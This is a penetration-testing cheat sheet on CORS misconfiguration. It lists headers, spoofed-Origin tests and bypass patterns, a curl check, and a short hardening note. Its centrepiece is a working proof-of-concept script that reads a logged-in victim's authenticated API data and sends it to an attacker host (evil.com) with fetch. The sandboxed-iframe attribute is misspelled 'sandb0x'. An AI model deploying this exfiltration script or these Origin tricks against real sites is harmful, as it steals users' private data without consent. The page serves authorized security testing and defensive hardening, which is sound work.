← All cheat sheets

CORS-MISCONFIGURATION

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Cross-Origin Resource Sharing controls which origins may read cross-site
responses. Misconfigurations let a malicious site read authenticated data.
Test only apps you are permitted to assess.

THE HEADERS#

Access-Control-Allow-Origin: <origin> | *       # who may read the response
Access-Control-Allow-Credentials: true          # include cookies/creds
Note: ACAO: * CANNOT be combined with credentials:true (browser blocks it).
The danger is reflecting an arbitrary Origin WITH credentials:true.

TESTS (send Origin, inspect ACAO)#

1) Reflected origin + creds (critical):
   Request:  Origin: https://evil.com
   Response: Access-Control-Allow-Origin: https://evil.com
             Access-Control-Allow-Credentials: true
2) Null origin trusted:
   Origin: null  -> ACAO: null    (reachable via sandboxed iframe/data: URL)
3) Pre-domain / suffix / substring logic flaws:
   Origin: https://evil-target.com      (prefix match bug)
   Origin: https://target.com.evil.com  (suffix match bug)
   Origin: https://targetXcom (regex dot not escaped)
4) Weak regex allowing subdomain takeover domain, or http:// when site is https.
5) Wildcard subdomain + an XSS on any subdomain -> read main app data.

PROOF OF CONCEPT (reflected origin + creds)#

<script>
var x=new XMLHttpRequest();
x.open('GET','https://target.com/api/me',true);
x.withCredentials=true;
x.onload=function(){ fetch('https://evil.com/c?d='+encodeURIComponent(x.responseText)); };
x.send();
</script>
Host on your origin; a logged-in victim visiting it leaks their data.
'null' origin PoC: host inside <iframe sandb0x="allow-scripts" src="data:text/html,...">.

CURL QUICK CHECK#

curl -s -I -H "Origin: https://evil.com" https://target.com/api/ | grep -i access-control
# look for the reflected origin + allow-credentials: true

HARDENING (blue-team note)#

Use a strict allowlist (exact string match), never reflect arbitrary Origin,
never return ACAO:* with credentials, reject 'null', and don't rely on
startsWith/endsWith/regex matching of the Origin.